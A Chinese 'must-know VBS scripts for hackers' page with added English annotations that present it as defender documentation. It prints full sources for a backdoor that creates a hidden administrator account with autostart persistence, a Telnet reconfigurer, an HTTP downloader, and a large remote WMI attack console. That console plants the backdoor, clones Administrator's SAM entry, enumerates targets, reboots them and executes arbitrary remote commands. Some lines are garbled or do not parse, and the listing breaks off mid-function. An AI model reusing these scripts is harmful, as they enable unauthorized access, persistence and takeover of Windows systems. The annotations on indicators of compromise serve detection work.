黑客必须要知道的几个vbs文件代码

软件设计 2017-03-31

1. door.vbs

'*************** 

'door.vbs by 黑嘿黑

'***************

' door.vbs -- local persistence / backdoor dropper. Documented here for defenders; every
' literal below (account name, password, registry paths) is a concrete indicator of compromise.
' Flow: hide the script file, create a hard-coded local administrator, register the script
' to re-run from three autostart locations. Requires an already-elevated caller.
dim wsh,FA,FSO
set fso=CreateObject("Scripting.FileSystemObject") 
' FA is the running script itself (its path is FA's default property, used in the Regwrite calls below).
Set FA= FSO.GetFile(WScript.scriptFullName)
' 34 = Hidden (2) + Archive (32) in the FileSystemObject attribute flags: the script file becomes hidden.
FA.Attributes =34
set wsh=CreateObject("WScript.Shell")
' Hard-coded backdoor account: user IUSE_SERVER, password xyhack.91i.net. The "0,true" runs the
' command with a hidden window and waits for it. Any local account with this name is an IOC.
wsh.run "net user IUSE_SERVER xyhack.91i.net /add",0,true
wsh.run "net localgroup administrators IUSE_SERVER /add" ,0,true
' Persistence #1: HKLM Run value named "Win32" pointing at this script (runs at logon).
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32",""&FA&""
' Sets Explorer's "Show hidden files" CheckedValue to 0 so the hidden script file stays out of view.
' NOTE: this statement is printed on two lines by the page without a "_" continuation; as shown it
' will not parse. Left byte-for-byte as published.
wsh.Regwrite 
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
' Persistence #2 and #3: Command Processor AutoRun (machine and user hive). cmd.exe executes this
' value every time it starts, which is what re-creates the account after an admin deletes it --
' the "undying account" the page describes. Both values are plain-text and trivially auditable.
wsh.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun",""&FA&""
wsh.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun",""&FA&""

功能:添加一个管理员帐号并使其"不死"——脚本把自己写入 HKLM Run 键(随登录启动)以及 HKLM/HKCU 的 Command Processor AutoRun(每次 cmd.exe 启动时重新执行 net user / net localgroup),同时把自身设为隐藏文件并关闭资源管理器的"显示隐藏文件"选项。注意:这并不是真正的彻底隐藏——`net user`、Autoruns 或直接检查上述注册表值都能发现它;脚本本身需要管理员权限才能执行成功。

使用:直接运行。

2. ntlm.vbs

'*************** 

'ntlm.vbs by 黑嘿黑

'***************

' ntlm.vbs -- writes two Microsoft Telnet Server settings under HKLM (needs administrator rights).
' Arguments come straight from the command line with no validation: arg0 -> NTLM, arg1 -> TelnetPort.
' Both are written as REG_DWORD; a non-numeric argument makes RegWrite raise and the script dies (no error handling).
dim wsh 
set wsh=CreateObject("WScript.Shell") 
' NTLM authentication mode of the Telnet service (rcmd.vbs's telnet() below only accepts 0-2 for this value).
wsh.regwrite "HKLM\Software\Microsoft\TelnetServer\1.0\NTLM",WScript.Arguments(0),"REG_DWORD" 
' TCP port the service listens on; moving it off 23 is a simple evasion of port-based monitoring --
' watch for unexpected values here and for tlntsvr listening on non-standard ports.
wsh.regwrite "HKLM\Software\Microsoft\TelnetServer\1.0\TelnetPort",WScript.Arguments(1),"REG_DWORD" 

功能:自定义 Telnet 服务的 NTLM 认证模式和监听端口(写入 HKLM\Software\Microsoft\TelnetServer\1.0 下的 NTLM 和 TelnetPort 两个 REG_DWORD 值,需要管理员权限;参数未做任何校验,非数字参数会使 RegWrite 直接报错)。

使用:D:\>ntlm.vbs 1 999 (第一个参数写入 NTLM——下文 rcmd.vbs 的 telnet() 只接受 0–2;第二个参数写入 TelnetPort)

3. iget.vbs

'*************************** 

'iget.vbs Mod by 黑嘿黑

'***************************

' iget.vbs -- minimal HTTP downloader: GET arg0 and write the raw response body to file arg1.
' Caveats visible in the code: no HTTP status check (an error page is saved as the file), no size
' limit (the whole body is buffered in memory), and both arguments are lower-cased with LCase,
' which can change the URL path on case-sensitive servers and the output file name.
Set xPost = CreateObject("Microsoft.XMLHTTP") 
' Third argument 0 = synchronous request; Send() blocks until the response arrives.
xPost.Open "GET",LCase(WScript.Arguments(0)),0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
' Mode 3 = adModeReadWrite, Type 1 = adTypeBinary (binary copy, no text conversion).
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
' 2 = adSaveCreateOverWrite: an existing file at that path is silently replaced.
sGet.SaveToFile LCase(WScript.Arguments(1)),2

功能:命令行下下载 HTTP 文件。注意:脚本不检查 HTTP 状态码和响应大小(404 页面也会被原样存盘),整个响应体先读入内存,再以覆盖方式(SaveToFile 的参数 2 = adSaveCreateOverWrite)写入目标文件;URL 和目标文件名都会被 LCase 转成小写。

使用:D:\>iget.vbs http://xyhack.91i.net/vbs.rar vbs.rar

4. rcmd.vbs

'*************** 

'rcmd.vbs by 黑嘿黑

'***************

' rcmd.vbs -- interactive WMI remote-administration / attack console (documented for defenders).
' Connects to a remote host over DCOM/WMI with a username and password given on the command line,
' then offers the menu in main(): toggle telnet, enable RDP, clear every event log, enumerate the
' host, run commands, kill processes, clone an account onto Administrator's SAM entry, drop a backdoor.
' Detection opportunities: remote WMI logons to root/cimv2 and root/default followed by
' Win32_Process.Create of "cmd /c echo ... >> ..." chains, "at" jobs, and the artifacts listed per function.
' Global: from here on every runtime error is suppressed, so most "OK!" messages in this script are unreliable.
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
' Started under wscript.exe (no console)? Relaunch under cscript inside a cmd window.
' Note the wscript.exe instance does not quit afterwards; it falls through to the argument check.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
end if
if wscript.arguments.count<3 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if 
' Credentials on the command line: they are captured by process-creation / command-line auditing.
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
usage()
outstreem.write "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
' Requests extra token privileges on the WMI connection. The numbers are WbemPrivilegeEnum values;
' 23/18/7/11 appear to be RemoteShutdown, Shutdown, Security and SystemTime -- what reboot(),
' clog() and ca() need. Verify against the enum before relying on this reading.
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
objswbemservices.security_.privileges.add 7,true
objswbemservices.security_.privileges.add 11,true
' Defect (left as published): "errornumber" is never assigned here, so it is Empty and Empty<>0 is
' False -- "OK!" is printed even when ConnectServer failed; later WMI calls then fail silently.
if errornumber<>0 then
wscript.echo "Error!"
call main()
else
wscript.echo "OK!"
end if
' main() never returns normally (every command re-enters main()), so this is the end of the top level.
call main()

'***********************************************************

' door(): drops the same backdoor as door.vbs on the remote host without copying any file.
' One Win32_Process.Create runs a "cmd /c echo ... >> file" chain that writes
' %windir%\system32\svrer.vbs line by line; a second Create runs it with cscript.
' What the dropped script does (read the echo lines): hides itself (attributes 34 = Hidden+Archive),
' writes %windir%\system32\SYSTEM.bat (net user IUSE_SERVER ... /add, net localgroup administrators ...,
' attrib +h), runs the same two net commands directly, registers Run\Win32 and both Command Processor
' AutoRun values pointing at svrer.vbs, zeroes Explorer's SHOWALL\CheckedValue, and schedules SYSTEM.bat
' with "at" for 20:00 / 20:10 / 20:20 / 20:30.
' Hunt for: svrer.vbs, SYSTEM.bat, local account IUSE_SERVER, the Run/AutoRun values, those "at" jobs.
' NOTE: the page wraps several lines of the cmddoor literal (the two Regwrite lines, "%win / dir%" and
' the final "at" line) without a "_" continuation; as printed the string does not parse. Left as-is,
' and no comments are placed inside the continued statement so as not to break it further.
function door()
outstreem.write "Creating the blankdoor .."
set objinstproc=objswbemservices.get("win32_process")
cmddoor="cmd /c echo dim wsh,FA,FSO,t>%windir%\system32\svrer.vbs" _
&"&& echo set fso=CreateObject(""Scripting.FileSystemObject"") >>%windir%\system32\svrer.vbs" _
&"&& echo Set FA= FSO.GetFile(WScript.scriptFullName)>>%windir%\system32\svrer.vbs" _
&"&& echo FA.Attributes =34>>%windir%\system32\svrer.vbs" _
&"&& echo set t=fso.CreateTextFile(""%windir%\system32\SYSTEM.bat"",true)>>%windir%\system32\svrer.vbs" _
&"&& echo t.WriteLine(""net user IUSE_SERVER xyhack.91i.net /add"")>>%windir%\system32\svrer.vbs" _
&"&& echo t.WriteLine(""net localgroup administrators IUSE_SERVER /add"")>>%windir%\system32\svrer.vbs" _ 
&"&& echo t.WriteLine(""Attrib +h %windir%\system32\SYSTEM.bat"")>>%windir%\system32\svrer.vbs" _
&"&& echo t.Close>>%windir%\system32\svrer.vbs"_
&"&& echo set wsh=CreateObject(""WScript.Shell"")>>%windir%\system32\svrer.vbs" _
&"&& echo wsh.run ""net user IUSE_SERVER xyhack.91i.net /add"",0,true>>%windir%\system32\svrer.vbs" _
&"&& echo wsh.run ""net localgroup administrators IUSE_SERVER /add"" ,0,true>>%windir%\system32\svrer.vbs" _
&"&& echo wsh.Regwrite 
""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _
&"&& echo wsh.Regwrite 
""HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"",0,""REG_DWORD"">>%win
dir%\system32\svrer.vbs" _
&"&& echo wsh.regwrite ""HKEY_LOCAL_MACHINE\Software\Microsoft\Command 
Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _
&"&& echo wsh.regwrite ""HKEY_CURRENT_USER\Software\Microsoft\Command 
Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _
&"&& echo wsh.run ""cmd /c at 20:00,20:10,20:20,20:30 %windir%\system32\SYSTEM.bat"",0,true 
>>%windir%\system32\svrer.vbs"
objinstproc.create(cmddoor)
' showerror() re-enters main() on error and never returns here.
showerror(err.number)
' Gives the remote echo chain time to finish writing the file before it is executed.
Wscript.Sleep(1500)
outstreem.write "Runing the blankdoor .."
objinstproc.create("cmd /c cscript %windir%\system32\svrer.vbs")
showerror(err.number)
call main()
end function

'***********************************************************

' ca(): "account clone". Reads the SAM "F" value of RID 0x1F4 (the built-in Administrator) and
' writes it over the SAM entry of the user entered at the prompt, so that account takes on
' Administrator's attributes while still looking like an ordinary user in net user / lusrmgr.
' SAM\SAM\... is only writable as SYSTEM, so the write is delegated to a scheduled "at" job
' (presumably because such jobs run as SYSTEM -- hence the file name getsys.vbs): the clock is set to
' 23:58:59 so a 23:59 job fires almost immediately, then the original time is restored.
' Artifacts: %temp%\ca.vbs, %temp%\getsys.vbs, a transient "at" job, a ~1 s system-time change (time-change
' audit events), the Schedule service being started, the marker value
' HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings\caflag, and "net user <name> <password>" resetting
' the cloned account's password with the password visible in the remote process command line.
' NOTE: the page prints `"?name&"` where the target's SAM key name is inserted into ca.vbs -- a garbled
' token (regname, computed below, is what the surrounding code prepares); as printed it does not parse.
function ca()
Wscript.Echo "enter the causername:"
causername=WScript.StdIn.Readline()
Wscript.Echo "enter the capassword:"
capassword=WScript.StdIn.Readline()
outstreem.write "Getting SID of "&causername&" ...."
' The name is interpolated into WQL inside double quotes; a name containing a quote breaks the query.
set colinstsid=objswbemservices.execquery("select * from win32_useraccount where name="&chr(34)&causername&chr(34))
for each objinstsid in colinstsid
strsid=objinstsid.sid
' RID = text after the last "-" of the SID; regname = that RID as 8-digit zero-padded hex,
' which is how SAM\SAM\Domains\Account\Users names its per-user subkeys (000001F4 = RID 500).
sidflag=right(strsid,len(strsid)-instrrev(strsid,"-"))
strflag=cstr(hex(sidflag))
regname=string(8-len(strflag),"0")&strflag
next
if strsid="" then
wscript.echo "Error."&vbcrlf&"Username is not exist."
call main()
else
wscript.echo "OK!"
end if
outstreem.write "Prepairing .."
set objinstproc=objswbemservices.get("win32_process")
showerroronly(err.number)
' ca.vbs (to be run by the scheduler): GetBinaryValue of Administrator's "F" value, SetBinaryValue of it
' onto the target's key, then set caflag="1" so the polling loop below can tell that it ran.
cmdline="cmd /c echo set oreg=getobject(""winmgmts:root\default:stdregprov"")>%temp%\ca.vbs" _
&"&& echo oreg.getbinaryvalue ^&h80000002,""SAM\SAM\Domains\Account\Users\000001F4"",""F"",uvalue >>%temp%\ca.vbs" _
&"&& echo oreg.setbinaryvalue ^&h80000002,""SAM\SAM\Domains\Account\Users\"?name&""",""F"",uvalue >>%temp%\ca.vbs" _
&"&& echo set sh=createobject(""wscript.shell"")>>%temp%\ca.vbs" _
&"&& echo sh.regwrite ""HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings\caflag"",""1"" >>%temp%\ca.vbs"
objinstproc.create(cmdline)
showerroronly(err.number)
' getsys.vbs: remember the current time, "at 23:59 cscript ca.vbs", set the clock to 23:58:59.90,
' sleep 1.1 s, restore the saved time.
cmdline="cmd /c echo atime=time>%temp%\getsys.vbs" _
&"&& echo set sh=createobject(""wscript.shell"")>>%temp%\getsys.vbs" _
&"&& echo sh.run ""cmd /c at 23:59 cscript %temp%\ca.vbs"",0,true >>%temp%\getsys.vbs" _
&"&& echo sh.run ""cmd /c time 23:58:59.90"",0,true >>%temp%\getsys.vbs" _
&"&& echo wscript.sleep(1100)>>%temp%\getsys.vbs" _
&"&& echo sh.run ""cmd /c time ""^&atime,0,true >>%temp%\getsys.vbs"
objinstproc.create(cmdline)
showerror(err.number)
outstreem.write "Processing ."
' Make sure the Schedule service is enabled and running; flag1/flag2 record what was changed so it
' can be put back afterwards (a disabled-then-re-disabled service still leaves service-control events).
set colinstsvr=objswbemservices.execquery("select * from win32_service where name='schedule'")
showerroronly(err.number)
for each objinstsvr in colinstsvr
flag1=0
flag2=0
if objinstsvr.startmode="Disabled" then
objinstsvr.changestartmode("Manual")
flag1=1
end if
' "flase" is a typo for False: it is an undeclared variable (Empty). In VBScript a Boolean False
' compares equal to Empty, so this branch appears to behave as intended for a stopped service.
if objinstsvr.started=flase then
errnumber=objinstsvr.startservice()
flag2=1
end if
showerroronly(err.number)
objinstproc.create("cmd /c cscript %temp%\getsys.vbs")
showerroronly(err.number)
' Poll the caflag marker (up to 20 x 500 ms) through the remote registry provider until ca.vbs has run.
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
for i=1 to 20
objinstreg.getstringvalue &h80000002,"SOFTWARE\Microsoft\Windows Script Host\Settings","caflag",svalue
if svalue="1" then
exit for
else
wscript.sleep(500)
end if
next
' Sets the cloned account's password on the target; runs regardless of whether the poll succeeded.
objinstproc.create("net user "&causername&" "&capassword)
if flag1 then objinstsvr.changestartmode("Disabled")
if flag2 then objinstsvr.stopservice()
next
if svalue<>"1" then
wscript.echo "Error."&vbcrlf&"Waiting time out."
else
showerror(err.number)
end if
' Clean-up: remove the two temp scripts and the marker value. The SAM modification itself stays.
outstreem.write "Clean Up .."
objinstproc.create("cmd /c del %temp%\ca.vbs")
showerroronly(err.number)
objinstproc.create("cmd /c del %temp%\getsys.vbs")
showerroronly(err.number)
if svalue="1" then objinstreg.deletevalue &h80000002,"SOFTWARE\Microsoft\Windows Script Host\Settings","caflag"
showerror(err.number)
call main()
end function

' showerroronly(errornumber): progress-dot variant of showerror().
' If errornumber is truthy, prints the hex of the *global* err.number (not the argument) plus the
' description and re-enters main() -- it never returns to the caller. Otherwise writes a single "."
' with no newline. Because of the script-wide On Error Resume Next, err.number may still hold an
' error from an earlier statement, so the reported error can belong to a different call.
function showerroronly(errornumber)
if errornumber Then
wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
if err.description <> "" then
wscript.echo "Error description: "&err.description&"."
end if
call main()
else
outstreem.write "."
end if
end function

'***********************************************************

' share(): sub-menu for SMB share management on the target (list / create / delete).
' Input is read from stdin and matched verbatim; an unrecognized entry matches no case and the
' function simply returns to whoever called it (normally main()).
function share()
Wscript.Echo string(18,"-")
Wscript.Echo "0.返回CMD> ="
wscript.echo "1.列出共享信息: ="
Wscript.Echo "2.创建共享 ="
Wscript.Echo "3.删除共享 ="
Wscript.Echo string(18,"-")
Wscript.Echo "please chose the parameter:"
parameters=WScript.StdIn.Readline()
Select Case parameters
case "quit" , "0"
main()
case "list" , "1"
listshare()
case "open" , "2"
openshare()
case "close" ,"3"
closeshare()
end Select 
end function

' listshare(): enumerates Win32_Share on the target and prints Caption / Name / Path per share,
' then returns to the share() sub-menu. Read-only apart from the WMI query itself.
function listshare()
outstreem.write "Listing the Netshare from "&ipaddress&"...."
Set colShares = objswbemservices.ExecQuery("Select * from Win32_Share")
showerror(err.number)
wscript.echo _
("Caption"&chr(9)&chr(9)&"Name: "&chr(9)&chr(9)&"Path") 
For each objShare in colShares 
wscript.echo _
(objShare.Caption&chr(9)&objShare.Name &chr(9)&chr(9)&objShare.Path)
Next
wscript.echo vbcrlf&"All Share have been listed Successfully!"
call share()
end function

' openshare(): creates a new SMB share on the target via Win32_Share.Create.
' Prompts for a local path and a share name; type 0 = disk drive share, up to 25 connections,
' description "默认共享" (the default-share label). No ACL is passed, so the share gets the
' provider's default permissions. The return code in errReturn is never checked -- the
' "Ceated Successfully" message is printed unconditionally.
function openshare()
wscript.echo "Enter the path:"
path=WScript.StdIn.Readline()
wscript.echo "Enter the name:"
sname=WScript.StdIn.Readline()
Const FILE_SHARE = 0
Const MAXIMUM_CONNECTIONS = 25
Set objNewShare = objswbemservices.Get("Win32_Share")
errReturn = objNewShare.Create _
(path, sname, FILE_SHARE, _
MAXIMUM_CONNECTIONS, "默认共享")
wscript.echo "Then Share have been Ceated Successfully!"
call share()
end function

' closeshare(): deletes the share whose Name matches the stdin input (Win32_Share.Delete).
' The name is concatenated into the WQL string inside single quotes without escaping, so a name
' containing a quote breaks -- or widens -- the query. Deleting administrative shares (C$, ADMIN$)
' through this path would also show up as a share-removed event on the target.
function closeshare()
wscript.echo "Plese Enter The name:"
kname=WScript.StdIn.Readline()
outstreem.write "killing the "&kname&" ...."
Set colShares = objswbemservices.ExecQuery _
("Select * from Win32_Share Where Name ="&"'"&kname&"' ")
For Each objShare in colShares
objShare.Delete
Next
showerror(err.number)
call share()
end function

'***********************************************************

' listsvr(): enumerates Win32_Service on the target and prints Name / State / StartMode / PathName.
' Names shorter than 8 characters get an extra tab for rough column alignment. Read-only.
' Note: main()'s menu references this as `list listsvr()` (see main), which as printed is not a plain call.
function listsvr()
outstreem.write "Listing the Service from "&ipaddress&"...."
Set colListOfServices = objswbemservices.ExecQuery _
("Select * from Win32_Service")
showerror(err.number)
wscript.echo _
("Name"&chr(9)&chr(9)&"State"&chr(9)&chr(9)&"Mode"&chr(9)&"Path Name ") 
For Each objService in colListOfServices 
if len(objService.name)<8 then
strname=objService.name&chr(9)
else
strname=objService.name
end if
wscript.echo _
(strname&chr(9)&objService.State&chr(9)&chr(9)&objService.StartMode&chr(9)&objService.PathName)
Next
wscript.echo vbcrlf&"All Services have been listed Successfully!"
call main()
end function

'************************************************************

' reboot(): restarts the target through Win32_OperatingSystem.Win32Shutdown.
' Flag 6 = Reboot (2) + Forced (4): running applications are terminated without prompting.
' Requires the Shutdown/RemoteShutdown privileges requested at the top of the script.
function reboot()
outstreem.write "Now, restarting target...."
strwqlquery="select * from win32_operatingsystem where primary='true'"
set colinstances=objswbemservices.execquery(strwqlquery)
for each objinstance in colinstances
objinstance.win32shutdown(6)
next
showerror(err.number)
call main()
end function

'*************************************************************

' inf(): host reconnaissance. Pulls OS, CPU, memory, BIOS, display, disk, NIC, hotfix and
' installed-application details from the target over WMI and prints them through wnl().
' Everything is read-only; the footprint is a burst of WMI queries against root/cimv2 plus one
' StdRegProv EnumKey/GetStringValue walk of HKLM\...\Uninstall via root/default.
' Known rough edges (left as published): objget() returns the *last* instance of each class, the
' closing message embeds the text "&ipaddress&" literally instead of the address, and the local
' name "str" is first used as a String and then ReDim'ed as an array (any error there is masked by
' On Error Resume Next).
function inf()
outstreem.write "Getting Infomation from "&ipaddress&"...."
set obj1=objget("win32_computersystem")
showerror(err.number)
wscript.echo ""&vbcrlf
set obj2=objget("win32_operatingsystem")
set col3=objswbemservices.instancesof("win32_processor")
set obj4=objget("win32_logicalmemoryconfiguration")
set obj5=objget("win32_bios")
set obj6=objget("win32_displayconfiguration")
set col7=objswbemservices.instancesof("win32_diskdrive")
set col8=objswbemservices.instancesof("win32_logicaldisk")
set col9=objswbemservices.instancesof("win32_networkadapterconfiguration")
set col10=objswbemservices.instancesof("win32_quickfixengineering")
' --- OS / computer-system section ---
wnl "OS Info :"
wnl " Computer Name : "&obj1.name
wnl " User Name : "&obj1.username
wnl " Domain : "&obj1.domain
' Maps Win32_ComputerSystem.DomainRole (0-5) to a label.
domainrole=""
select case obj1.domainrole
case 0
domainrole="Workstation"
case 1
domainrole="Member Workstation"
case 2
domainrole="Server"
case 3
domainrole="Member Server"
case 4
domainrole="Backup Domain Controller"
case 5
domainrole="Main Domain Controller"
end select
with obj2
wnl " Domain Role : "&domainrole
wnl " Caption : "&.caption
wnl " Organization : "&.organization
wnl " Registered User : "&.registereduser
wnl " Install Date : "&timeformat(.installdate)
wnl " Last BootUp Time : "&timeformat(.lastbootuptime)
wnl " Windows Directory : "&.windowsdirectory
wnl " System Directory : "&.systemdirectory
wnl " Boot Device : "&.bootdevice
wnl " Country Code : "&.countrycode
wnl " CSName : "&.csname
wnl " Description : "&.description
wnl " Manufacturer : "&.manufacturer
wnl " Serial Number : "&.serialnumber
wnl " Version : "&.version
wnl " System Type : "&obj1.systemtype
wnl " System Startup Delay : "&obj1.systemstartupdelay&"s"
' First boot option on the label line, remaining options indented underneath.
wnl " System Startup Options : "&obj1.systemstartupoptions(0)
for i=1 to ubound(obj1.systemstartupoptions)
wnl space(28)&obj1.systemstartupoptions(i)
next
end with
' --- Processor section (one entry per Win32_Processor instance) ---
wnl vbcrlf&"Processor Info :"
wnl " Number Of Processors : "&obj1.numberofprocessors
for each obj3 in col3
with obj3
wnl " Device ID : "&.deviceid
wnl " Name : "&.name
wnl " Current Clock Speed : "&.currentclockspeed&"MHz"
wnl " Description : "&.description
wnl " Ext Clock : "&.extclock&"MHz"
wnl " L2 Cache Size : "&.l2cachesize&"KB"
wnl " L2 Cache Speed : "&.l2cachespeed&"MHz"
wnl " Processor Id : "&.processorid
wnl " Manufacturer : "&.manufacturer
wnl " Socket Designation : "&.socketdesignation
wnl " Address Width : "&.addresswidth&"Bit"
wnl " Data Width : "&.datawidth&"Bit"
end with
next
' --- Memory section: values are reported in KB by these classes, hence /1024 for MB ---
with obj4
wnl vbcrlf&"Memory Info :"
wnl " Total Physical Memory : "&cint(.totalphysicalmemory/1024)&"MB"
wnl " Free Physical Memory : "&cint(obj2.freephysicalmemory/1024)&"MB"
wnl " Total PageFile Space : "&cint(.totalpagefilespace/1024)&"MB"
wnl " Total Virtual Memory : "&cint(.totalvirtualmemory/1024)&"MB"
wnl " Available Virtual Memory : "&cint(.availablevirtualmemory/1024)&"MB"
end with
' --- BIOS section ---
wnl vbcrlf&"BIOS Info :"
wnl " Description : "&obj5.description
wnl " Current Language : "&obj5.currentlanguage
wnl " Version : "&obj5.version
wnl " Manufacturer : "&obj5.manufacturer
' --- Display section ---
with obj6
wnl vbcrlf&"Display Configuration :"
wnl " Caption : "&.caption
wnl " Device Name : "&.devicename
wnl " Driver Version : "&.driverversion
wnl " Display Frequency : "&.displayfrequency&"Hz"
wnl " Bits Per Pel : "&.bitsperpel&"Bit"
wnl " Pels : "&.pelswidth&" x "&.pelsheight
end with
' --- Physical disks ---
wnl vbcrlf&"Disk Info :"
for each obj7 in col7
with obj7
wnl " DeviceID : "&.deviceid
wnl " Caption : "&.caption
wnl " Interface Type : "&.interfacetype
wnl " SCSI Bus : "&.scsibus
wnl " SCSI Logical Unit : "&.scsilogicalunit
wnl " SCSI Port : "&.scsiport
wnl " SCSI TargetId : "&.scsitargetid
wnl " Sectors Per Track : "&.sectorspertrack&"KB"
wnl " Partitions : "&.partitions
wnl " Size : "&sizeformat(.size)
end with
next
' --- Logical volumes: fixed-width table built with wsp() ---
str=" Volume"+space(2)+"Type"+space(8)+"Format"+space(4)
str=str+"Size"+space(6)+"Free"+space(12)+"Label"
wnl str
for each obj8 in col8
with obj8
' Maps Win32_LogicalDisk.DriveType (0-6) to a label.
drivetype=""
select case .drivetype
case 0
drivetype="Unknow"
case 1
drivetype="NoRootDir"
case 2
drivetype="Removable"
case 3
drivetype="Fixed"
case 4
drivetype="Network"
case 5
drivetype="CD-ROM"
case 6
drivetype="RAM"
end select
' Free-space percentage only when both Size and FreeSpace are populated (they are empty for e.g. CD-ROM).
strpercent=""
if .size<>"" and .freespace<>"" then
strpercent=" ("&formatpercent(.freespace/.size,0)&")"
end if
str=" "&wsp(.caption,8)&wsp(drivetype,12)&wsp(.filesystem,10)&wsp(sizeformat(.size),10)
str=str&wsp(sizeformat(.freespace)&strpercent,16)&.volumename
wnl str
end with
next
' --- NICs: only IP-enabled adapters; array-valued properties are flattened by wfl() ---
wnl vbcrlf&"NIC Informaton :"
for each obj9 in col9
with obj9
if .IPEnabled then
wnl " Index : "&.index
wnl " Description : "&.description
wnl " DHCP Enabled : "&.dhcpenabled
wnl " DHCP Server : "&.dhcpserver
wnl " DNS Host Name : "&.dnshostname
wnl " DNS Server Search Order : "&wfl(.dnsserversearchorder)
wnl " WINS Primary Server : "&.winsprimaryserver
wnl " IP Address : "&wfl(.ipaddress)
wnl " MAC Address : "&.macaddress
wnl " Default IP Gateway : "&wfl(.defaultipgateway)
wnl " IP Subnet : "&wfl(.ipsubnet)
wnl " IP Filter Security Enabled : "&.ipfiltersecurityenabled
wnl " IPSec Permit IP Protocols : "&wfl(.ipsecpermitipprotocols)
wnl " IPSec Permit TCP Ports : "&wfl(.ipsecpermittcpports)
wnl " IPSec Permit UDP Ports : "&wfl(.ipsecpermitudpports)
end if
end with
next
' --- Installed hotfixes (useful to an attacker for picking unpatched vulnerabilities) ---
wnl vbcrlf&"Hot Fixes Info :"
for each obj10 in col10
wnl " Hot Fix ID : "&obj10.hotfixid
wnl " Fix Comments : "&obj10.fixcomments
wnl " Install Date : "&obj10.installdate
wnl " Service Pack In Effect : "&obj10.servicepackineffect
next
' --- Installed applications: DisplayName of each HKLM\...\Uninstall subkey, read via StdRegProv ---
wnl vbcrlf&"Applications :"
set objswb1=objlocator.connectserver(ipaddress,"root/default",username,password)
set obj11=objswb1.get("stdregprov")
HKLM=&h80000002
keypath="SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"
obj11.enumkey HKLM,keypath,keyarray
redim str(ubound(keyarray)+1)
j=0
for i=0 to ubound(keyarray)
obj11.getstringvalue HKLM,keypath+keyarray(i),"displayname",strvalue
if strvalue<>"" then
str(j)=strvalue
j=j+1
end if
next
' Case-insensitive bubble sort of the collected names (strcomp mode 1 = text compare).
if j>1 then
for i=0 to j-1
for k=0 to j-i-1
if strcomp(str(k),str(k+1),1)=1 then
strtemp=str(k+1)
str(k+1)=str(k)
str(k)=strtemp
end if
next
next
end if
for i=0 to j-1
wnl " "&str(i)
next
wscript.echo ""&vbcrlf
' Defect (left as published): "&ipaddress&" is inside the string literal, so it is printed verbatim.
wscript.echo "The Infomation from &ipaddress& had been listed Successfully!"
call main()
end function

' wnl(msg): "write line" -- echoes msg to the console and, if a stream object named "of" exists,
' also appends it there. "of" is never assigned anywhere in this listing, so isobject(of) is
' False and the file branch is dead code (probably a leftover of a version that logged to a file).
' The showerror() call inside it passes no argument, which would raise at runtime if ever reached;
' the surrounding On Error Resume Next would hide that too.
sub wnl(msg)
wscript.echo msg
if isobject(of) then
on error resume next
of.writeline msg
showerror()
on error goto 0
end if
end sub

' wfl(obj): joins the elements of a WMI array property (e.g. IPAddress, DNSServerSearchOrder)
' into one space-separated string, with a trailing space. Passing a non-array raises on ubound().
function wfl(byref obj)
str=""
for i=0 to ubound(obj)
str=str&obj(i)&" "
next
wfl=str
end function

' wsp(msg,num): fixed-width column helper. Truncates msg to num-1 characters and pads with spaces
' to exactly num characters; an empty msg yields num spaces. Used by inf() for the volume table.
function wsp(msg,num)
if msg<>"" then
msg=left(msg,num-1)
wsp=msg&space(num-len(msg))
else
wsp=space(num)
end if
end function

' timeformat(msg): reformats a WMI CIM_DATETIME string (yyyymmddHHMMSS.ffffff+zzz) as
' "yyyy/mm/dd HH:MM:SS" by fixed-position slicing; the fraction and UTC offset are dropped,
' and a short or empty input simply yields a malformed string.
function timeformat(msg)
timeformat=left(msg,4)&"/"&mid(msg,5,2)&"/"&mid(msg,7,2)&" "&mid(msg,9,2)&":"&mid(msg,11,2)&":"&mid(msg,13,2)
end function

' sizeformat(msg): byte count -> "x.xGB" (above 1024 MB, 2 decimals) or "x.xMB" (1 decimal).
' 1048576 = 1024*1024. An empty msg returns Empty (the function's default), which callers
' concatenate as "".
function sizeformat(msg)
if msg<>"" then
size=msg/1048576
if size>1024 then
sizeformat=round(size/1024,2)&"GB"
else
sizeformat=round(size,1)&"MB"
end if
end if
end function

' objget(msg): returns a single instance of the WMI class named msg -- specifically the LAST one
' enumerated, since the loop overwrites obj on every iteration. If the class has no instances,
' obj is never set and the result is not an object (callers under On Error Resume Next then print blanks).
function objget(msg)
set col=objswbemservices.instancesof(msg)
for each objx in col
set obj=objx
next
set objget=obj
end function

'******************************************

' command(): prompt wrapper for run(); the two functions call each other in a loop until the user
' enters exit/quit/0, each call adding a frame to the stack.
function command()
wscript.echo "Plese Enter The Command:"
call run()
end function

' run(): remote command execution. Reads one line from stdin and hands it unchanged to
' Win32_Process.Create on the target, in the security context of the WMI credentials.
